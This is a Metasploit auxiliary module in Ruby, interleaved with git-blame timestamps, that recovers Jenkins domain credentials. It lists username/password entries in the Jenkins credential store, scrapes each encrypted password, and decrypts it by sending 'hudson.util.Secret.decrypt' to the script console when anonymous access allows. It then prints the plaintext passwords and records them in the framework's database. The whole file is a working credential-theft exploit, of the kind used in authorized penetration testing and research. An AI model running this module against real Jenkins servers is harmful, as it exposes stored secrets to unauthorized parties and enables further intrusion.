2015-11-23 22:23:59 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2015-11-23 22:23:59 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'json'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2015-11-23 22:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Jenkins Domain Credential Recovery',
|
|
|
|
'Description' => %q{
|
2015-11-24 02:26:41 +00:00
|
|
|
This module will collect Jenkins domain credentials, and uses
|
|
|
|
the script console to decrypt each password if anonymous permission
|
|
|
|
is allowed.
|
2015-11-23 22:23:59 +00:00
|
|
|
|
|
|
|
It has been tested against Jenkins version 1.590, 1.633, and 1.638.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Th3R3p0', # Vuln Discovery, PoC
|
|
|
|
'sinn3r' # Metasploit
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'EDB', '38664' ],
|
|
|
|
[ 'URL', 'http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html' ]
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'RPORT' => 8080
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-11-23 22:45:02 +00:00
|
|
|
OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
|
|
|
|
OptString.new('JENKINSDOMAIN', [true, 'The domain where we want to extract credentials from', '_'])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2015-11-23 22:23:59 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
# Returns the Jenkins version.
|
|
|
|
#
|
|
|
|
# @return [String] Jenkins version.
|
|
|
|
# @return [NilClass] No Jenkins version found.
|
|
|
|
def get_jenkins_version
|
|
|
|
uri = normalize_uri(target_uri.path)
|
|
|
|
res = send_request_cgi({ 'uri' => uri })
|
2015-11-24 06:15:05 +00:00
|
|
|
|
|
|
|
unless res
|
|
|
|
fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')
|
|
|
|
end
|
|
|
|
|
2015-11-23 22:23:59 +00:00
|
|
|
html = res.get_html_document
|
|
|
|
version_attribute = html.at('body').attributes['data-version']
|
|
|
|
version = version_attribute ? version_attribute.value : ''
|
|
|
|
version.scan(/jenkins\-([\d\.]+)/).flatten.first
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
# Returns the Jenkins domain configured by the user.
|
|
|
|
#
|
|
|
|
# @return [String]
|
|
|
|
def domain
|
|
|
|
datastore['JENKINSDOMAIN']
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
# Returns a check code indicating the vulnerable status.
|
|
|
|
#
|
|
|
|
# @return [Array] Check code
|
|
|
|
def check
|
|
|
|
version = get_jenkins_version
|
|
|
|
vprint_status("Found version: #{version}")
|
|
|
|
|
2015-11-24 02:33:14 +00:00
|
|
|
# Default version is vulnerable, but can be mitigated by refusing anonymous permission on
|
|
|
|
# decryption API. So a version wouldn't be adequate to check.
|
2015-11-23 22:23:59 +00:00
|
|
|
if version
|
2015-11-24 02:33:14 +00:00
|
|
|
return Exploit::CheckCode::Detected
|
2015-11-23 22:23:59 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
# Returns all the found Jenkins accounts of a specific domain. The accounts collected only
|
|
|
|
# include the ones with the username-and-password kind. It does not include other kinds such
|
|
|
|
# as SSH, certificates, or other plugins.
|
|
|
|
#
|
|
|
|
# @return [Array<Hash>] An array of account data such as id, username, kind, description, and
|
|
|
|
# the domain it belongs to.
|
|
|
|
def get_users
|
|
|
|
users = []
|
|
|
|
|
|
|
|
uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain)
|
|
|
|
uri << '/'
|
|
|
|
|
|
|
|
res = send_request_cgi({ 'uri'=>uri })
|
2015-11-24 06:15:05 +00:00
|
|
|
|
|
|
|
unless res
|
|
|
|
fail_with(Failure::Unknown, 'Connection timed out while enumerating accounts.')
|
|
|
|
end
|
|
|
|
|
2015-11-23 22:23:59 +00:00
|
|
|
html = res.get_html_document
|
|
|
|
rows = html.search('//table[@class="sortable pane bigtable"]//tr')
|
|
|
|
|
|
|
|
# The first row is the table header, which we don't want.
|
|
|
|
rows.shift
|
|
|
|
|
|
|
|
rows.each do |row|
|
|
|
|
td = row.search('td')
|
|
|
|
id = td[0].at('a').attributes['href'].value.scan(/^credential\/(.+)/).flatten.first || ''
|
|
|
|
name = td[1].text.scan(/^(.+)\/\*+/).flatten.first || ''
|
|
|
|
kind = td[2].text
|
|
|
|
desc = td[3].text
|
|
|
|
next unless /Username with password/i === kind
|
|
|
|
|
|
|
|
users << {
|
|
|
|
id: id,
|
|
|
|
username: name,
|
|
|
|
kind: kind,
|
|
|
|
description: desc,
|
|
|
|
domain: domain
|
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
users
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
# Returns the found encrypted password from the update page.
|
|
|
|
#
|
|
|
|
# @param id [String] The ID of a specific account.
|
|
|
|
#
|
|
|
|
# @return [String] Found encrypted password.
|
|
|
|
# @return [NilCass] No encrypted password found.
|
|
|
|
def get_encrypted_password(id)
|
|
|
|
uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain, 'credential', id, 'update')
|
|
|
|
res = send_request_cgi({ 'uri'=>uri })
|
2015-11-24 06:15:05 +00:00
|
|
|
|
|
|
|
unless res
|
|
|
|
fail_with(Failure::Unknown, 'Connection timed out while getting the encrypted password')
|
|
|
|
end
|
|
|
|
|
2015-11-23 22:23:59 +00:00
|
|
|
html = res.get_html_document
|
|
|
|
input = html.at('//div[@id="main-panel"]//form//table//tr/td//input[@name="_.password"]')
|
|
|
|
|
|
|
|
if input
|
|
|
|
return input.attributes['value'].value
|
|
|
|
else
|
|
|
|
vprint_error("Unable to find encrypted password for #{id}")
|
|
|
|
end
|
|
|
|
|
|
|
|
nil
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
# Returns the decrypted password by using the script console.
|
|
|
|
#
|
|
|
|
# @param encrypted_pass [String] The encrypted password.
|
|
|
|
#
|
|
|
|
# @return [String] The decrypted password.
|
|
|
|
# @return [NilClass] No decrypted password found (no result found on the console)
|
|
|
|
def decrypt(encrypted_pass)
|
|
|
|
uri = normalize_uri(target_uri, 'script')
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => uri,
|
|
|
|
'vars_post' => {
|
|
|
|
'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'",
|
|
|
|
'json' => {'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'"}.to_json,
|
|
|
|
'Submit' => 'Run'
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
2015-11-24 06:15:05 +00:00
|
|
|
unless res
|
|
|
|
fail_with(Failure::Unknown, 'Connection timed out while accessing the script console')
|
|
|
|
end
|
|
|
|
|
|
|
|
if /javax\.servlet\.ServletException: hudson\.security\.AccessDeniedException2/ === res.body
|
2015-11-24 02:26:41 +00:00
|
|
|
vprint_error('No permission to decrypt password')
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
2015-11-23 22:23:59 +00:00
|
|
|
html = res.get_html_document
|
|
|
|
result = html.at('//div[@id="main-panel"]//pre[contains(text(), "Result:")]')
|
|
|
|
if result
|
|
|
|
decrypted_password = result.inner_text.scan(/^Result: ([[:print:]]+)/).flatten.first
|
|
|
|
return decrypted_password
|
|
|
|
else
|
|
|
|
vprint_error('Unable to find result')
|
|
|
|
end
|
|
|
|
|
|
|
|
nil
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
# Decrypts an encrypted password for a given ID.
|
|
|
|
#
|
|
|
|
# @param id [String] Account ID.
|
|
|
|
#
|
|
|
|
# @return [String] The decrypted password.
|
|
|
|
# @return [NilClass] No decrypted password found (no result found on the console)
|
|
|
|
def descrypt_password(id)
|
|
|
|
encrypted_pass = get_encrypted_password(id)
|
|
|
|
decrypt(encrypted_pass)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
# Reports the username and password to database.
|
|
|
|
#
|
|
|
|
# @param opts [Hash]
|
|
|
|
# @option opts [String] :user
|
|
|
|
# @option opts [String] :password
|
|
|
|
# @option opts [String] :proof
|
|
|
|
#
|
|
|
|
# @return [void]
|
|
|
|
def report_cred(opts)
|
|
|
|
service_data = {
|
|
|
|
address: rhost,
|
|
|
|
port: rport,
|
|
|
|
service_name: ssl ? 'https' : 'http',
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :service,
|
|
|
|
module_fullname: fullname,
|
2015-11-24 02:26:41 +00:00
|
|
|
username: opts[:user]
|
2015-11-23 22:23:59 +00:00
|
|
|
}.merge(service_data)
|
|
|
|
|
2015-11-24 02:26:41 +00:00
|
|
|
if opts[:password]
|
|
|
|
credential_data.merge!(
|
|
|
|
private_data: opts[:password],
|
|
|
|
private_type: :password
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
2015-11-23 22:23:59 +00:00
|
|
|
login_data = {
|
|
|
|
core: create_credential(credential_data),
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
|
|
proof: opts[:proof]
|
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
create_credential_login(login_data)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
users = get_users
|
|
|
|
print_status("Found users for domain #{domain}: #{users.length}")
|
|
|
|
|
|
|
|
users.each do |user_data|
|
|
|
|
pass = descrypt_password(user_data[:id])
|
|
|
|
if pass
|
|
|
|
if user_data[:description].blank?
|
|
|
|
print_good("Found credential: #{user_data[:username]}:#{pass}")
|
|
|
|
else
|
|
|
|
print_good("Found credential: #{user_data[:username]}:#{pass} (#{user_data[:description]})")
|
|
|
|
end
|
2015-11-24 02:26:41 +00:00
|
|
|
else
|
|
|
|
print_status("Found #{user_data[:username]}, but unable to decrypt password.")
|
2015-11-23 22:23:59 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
report_cred(
|
|
|
|
user: user_data[:username],
|
|
|
|
password: pass,
|
|
|
|
proof: user_data.inspect
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def print_status(msg='')
|
|
|
|
super("#{peer} - #{msg}")
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def print_good(msg='')
|
|
|
|
super("#{peer} - #{msg}")
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def print_error(msg='')
|
|
|
|
super("#{peer} - #{msg}")
|
|
|
|
end
|
|
|
|
end
|